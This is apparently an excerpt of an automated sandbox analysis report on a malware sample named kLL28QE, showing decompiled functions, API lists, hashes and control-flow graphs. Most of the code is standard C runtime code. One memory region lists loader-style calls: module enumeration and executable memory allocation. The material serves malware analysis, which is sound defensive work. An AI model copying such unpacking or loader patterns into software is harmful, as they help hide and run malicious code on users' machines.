                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3322701435-0
                                                                                                                                                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                                                                      			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                      				signed int _v4;
                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				signed int _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t40 = __edi;
                                                                                                                                                                                                      				_t28 = __ebx;
                                                                                                                                                                                                      				_t45 = _t51;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                                                                                                                                                      					if(_t14 != 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = E0040D2E3(_a4);
                                                                                                                                                                                                      					__eflags = _t15;
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						__eflags =  *0x423490 & 0x00000001;
                                                                                                                                                                                                      						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                                                                                                                      							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                                                                                                                      							__eflags =  *0x423490;
                                                                                                                                                                                                      							E0040AEFC(0x423484);
                                                                                                                                                                                                      							E0040D2BD( *0x423490, 0x41a704);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E0040AF49( &_v16, 0x423484);
                                                                                                                                                                                                      						E0040CD39( &_v16, 0x420fa4);
                                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                                      						_t47 = _t45;
                                                                                                                                                                                                      						_push(_t47);
                                                                                                                                                                                                      						_push(0xc);
                                                                                                                                                                                                      						_push(0x420ff8);
                                                                                                                                                                                                      						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                                                                                                                                                      						_t42 = _v4;
                                                                                                                                                                                                      						__eflags = _t42;
                                                                                                                                                                                                      						if(_t42 != 0) {
                                                                                                                                                                                                      							__eflags =  *0x4250b0 - 3;
                                                                                                                                                                                                      							if( *0x4250b0 != 3) {
                                                                                                                                                                                                      								_push(_t42);
                                                                                                                                                                                                      								goto L16;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								E0040D6E0(_t28, 4);
                                                                                                                                                                                                      								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                      								_t24 = E0040D713(_t42);
                                                                                                                                                                                                      								_v40 = _t24;
                                                                                                                                                                                                      								__eflags = _t24;
                                                                                                                                                                                                      								if(_t24 != 0) {
                                                                                                                                                                                                      									_push(_t42);
                                                                                                                                                                                                      									_push(_t24);
                                                                                                                                                                                                      									E0040D743();
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_v16 = 0xfffffffe;
                                                                                                                                                                                                      								_t19 = E0040B70B();
                                                                                                                                                                                                      								__eflags = _v40;
                                                                                                                                                                                                      								if(_v40 == 0) {
                                                                                                                                                                                                      									_push(_v4);
                                                                                                                                                                                                      									L16:
                                                                                                                                                                                                      									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                                      										_t21 = E0040BFC1(__eflags);
                                                                                                                                                                                                      										 *_t21 = E0040BF7F(GetLastError());
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						return E0040E21D(_t19);
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      				goto L19;
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x0040b6cf
                                                                                                                                                                                                      0x0040b714
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040b6d1
                                                                                                                                                                                                      0x0040b6d3
                                                                                                                                                                                                      0x0040b6d9
                                                                                                                                                                                                      0x0040b6de
                                                                                                                                                                                                      0x0040b6e4
                                                                                                                                                                                                      0x0040b6e7
                                                                                                                                                                                                      0x0040b6e9
                                                                                                                                                                                                      0x0040b6eb
                                                                                                                                                                                                      0x0040b6ec
                                                                                                                                                                                                      0x0040b6ed
                                                                                                                                                                                                      0x0040b6f3
                                                                                                                                                                                                      0x0040b6f4
                                                                                                                                                                                                      0x0040b6fb
                                                                                                                                                                                                      0x0040b700
                                                                                                                                                                                                      0x0040b704
                                                                                                                                                                                                      0x0040b706
                                                                                                                                                                                                      0x0040b715
                                                                                                                                                                                                      0x0040b723
                                                                                                                                                                                                      0x0040b725
                                                                                                                                                                                                      0x0040b727
                                                                                                                                                                                                      0x0040b73a
                                                                                                                                                                                                      0x0040b73c
                                                                                                                                                                                                      0x0040b725
                                                                                                                                                                                                      0x0040b704
                                                                                                                                                                                                      0x0040b6cf
                                                                                                                                                                                                      0x0040b742
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040af7b
                                                                                                                                                                                                      0x0040af8b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                                                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 188 2f48146-2f4815f 189 2f48161-2f48163 188->189 190 2f48165 189->190 191 2f4816a-2f48176 CreateToolhelp32Snapshot 189->191 190->191 192 2f48186-2f48193 Module32First 191->192 193 2f48178-2f4817e 191->193 194 2f48195-2f48196 call 2f47e05 192->194 195 2f4819c-2f481a4 192->195 193->192 198 2f48180-2f48184 193->198 199 2f4819b 194->199 198->189 198->192 199->195
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F4816E
                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 02F4818E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F47000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2f47000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction ID: 157240974eb486c4bd7279820ee56febdb9338057e3c93c42dbd6113739f27da
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CF09C315007107FE7203BF59C8DB6F7AFCAF856A5F140529E746A11C0DFB0E8454651
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 201 40e7ee-40e7f6 call 40e7c3 203 40e7fb-40e7ff ExitProcess 201->203
                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E0040E7EE(int _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E0040E7C3(_a4); // executed
                                                                                                                                                                                                      				ExitProcess(_a4);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x0040e7f6
                                                                                                                                                                                                      0x0040e7ff

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 204 40d534-40d556 HeapCreate 205 40d558-40d559 204->205 206 40d55a-40d563 204->206
                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E0040D534(intOrPtr _a4) {
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                                      				 *0x4234b4 = _t6;
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					 *0x4250b0 = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 207 40ea0a-40ea16 call 40e8de 209 40ea1b-40ea1f 207->209
                                                                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                                                                      			E0040EA0A(intOrPtr _a4) {
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                      				void* _t5;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                                      				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}










                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 210 2f47e05-2f47e3f call 2f48118 213 2f47e41-2f47e74 VirtualAlloc call 2f47e92 210->213 214 2f47e8d 210->214 216 2f47e79-2f47e8b 213->216 214->214 216->214
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02F47E56
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F47000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2f47000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction ID: 428ae1a7b2e01c5270c71cc0a82053447e1e41f09e14fc1e1c35796f234ad5ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E113C79A00208EFDB01DF98C985E99BFF5AF08350F058094FA489B361D771EA50DF80
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408624952.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2eed000_kLL28QE.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 50f270dfbe6da6ccf22b8cca45d817638b48c6cabe3ccd51ae6ce0ddebb15287
                                                                                                                                                                                                      • Instruction ID: c13f99addc9ac5ce59d685bde9296b827e138a650a41dc9f39aac299dda73b0c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50f270dfbe6da6ccf22b8cca45d817638b48c6cabe3ccd51ae6ce0ddebb15287
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0921F4B2544240EFDF05CF54DDC0B16BBAAFB8C318F24C669E94A0B206C336D812DBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408624952.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                                      			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                      				intOrPtr _v0;
                                                                                                                                                                                                      				void* _v804;
                                                                                                                                                                                                      				intOrPtr _v808;
                                                                                                                                                                                                      				intOrPtr _v812;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                                                                      				long _t17;
                                                                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                                                                      				intOrPtr _t22;
                                                                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				intOrPtr _t27;
                                                                                                                                                                                                      				intOrPtr* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t6 = __eax;
                                                                                                                                                                                                      				_t34 = _t22 -  *0x422234; // 0x6dd51581
                                                                                                                                                                                                      				if(_t34 == 0) {
                                                                                                                                                                                                      					asm("repe ret");
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0x423b98 = _t6;
                                                                                                                                                                                                      				 *0x423b94 = _t22;
                                                                                                                                                                                                      				 *0x423b90 = _t25;
                                                                                                                                                                                                      				 *0x423b8c = _t21;
                                                                                                                                                                                                      				 *0x423b88 = _t27;
                                                                                                                                                                                                      				 *0x423b84 = _t26;
                                                                                                                                                                                                      				 *0x423bb0 = ss;
                                                                                                                                                                                                      				 *0x423ba4 = cs;
                                                                                                                                                                                                      				 *0x423b80 = ds;
                                                                                                                                                                                                      				 *0x423b7c = es;
                                                                                                                                                                                                      				 *0x423b78 = fs;
                                                                                                                                                                                                      				 *0x423b74 = gs;
                                                                                                                                                                                                      				asm("pushfd");
                                                                                                                                                                                                      				_pop( *0x423ba8);
                                                                                                                                                                                                      				 *0x423b9c =  *_t31;
                                                                                                                                                                                                      				 *0x423ba0 = _v0;
                                                                                                                                                                                                      				 *0x423bac =  &_a4;
                                                                                                                                                                                                      				 *0x423ae8 = 0x10001;
                                                                                                                                                                                                      				_t11 =  *0x423ba0; // 0x0
                                                                                                                                                                                                      				 *0x423a9c = _t11;
                                                                                                                                                                                                      				 *0x423a90 = 0xc0000409;
                                                                                                                                                                                                      				 *0x423a94 = 1;
                                                                                                                                                                                                      				_t12 =  *0x422234; // 0x6dd51581
                                                                                                                                                                                                      				_v812 = _t12;
                                                                                                                                                                                                      				_t13 =  *0x422238; // 0x922aea7e
                                                                                                                                                                                                      				_v808 = _t13;
                                                                                                                                                                                                      				 *0x423ae0 = IsDebuggerPresent();
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				E004138FC(_t14);
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                                                                                                                      				if( *0x423ae0 == 0) {
                                                                                                                                                                                                      					_push(1);
                                                                                                                                                                                                      					E004138FC(_t17);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x0041369b
                                                                                                                                                                                                      0x004136a3
                                                                                                                                                                                                      0x004136ab
                                                                                                                                                                                                      0x004136b6
                                                                                                                                                                                                      0x004136c0
                                                                                                                                                                                                      0x004136c5
                                                                                                                                                                                                      0x004136ca
                                                                                                                                                                                                      0x004136d4
                                                                                                                                                                                                      0x004136de
                                                                                                                                                                                                      0x004136e3
                                                                                                                                                                                                      0x004136e9
                                                                                                                                                                                                      0x004136ee
                                                                                                                                                                                                      0x004136fa
                                                                                                                                                                                                      0x004136ff
                                                                                                                                                                                                      0x00413701
                                                                                                                                                                                                      0x00413709
                                                                                                                                                                                                      0x00413714
                                                                                                                                                                                                      0x00413721
                                                                                                                                                                                                      0x00413723
                                                                                                                                                                                                      0x00413725
                                                                                                                                                                                                      0x0041372a
                                                                                                                                                                                                      0x0041373e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
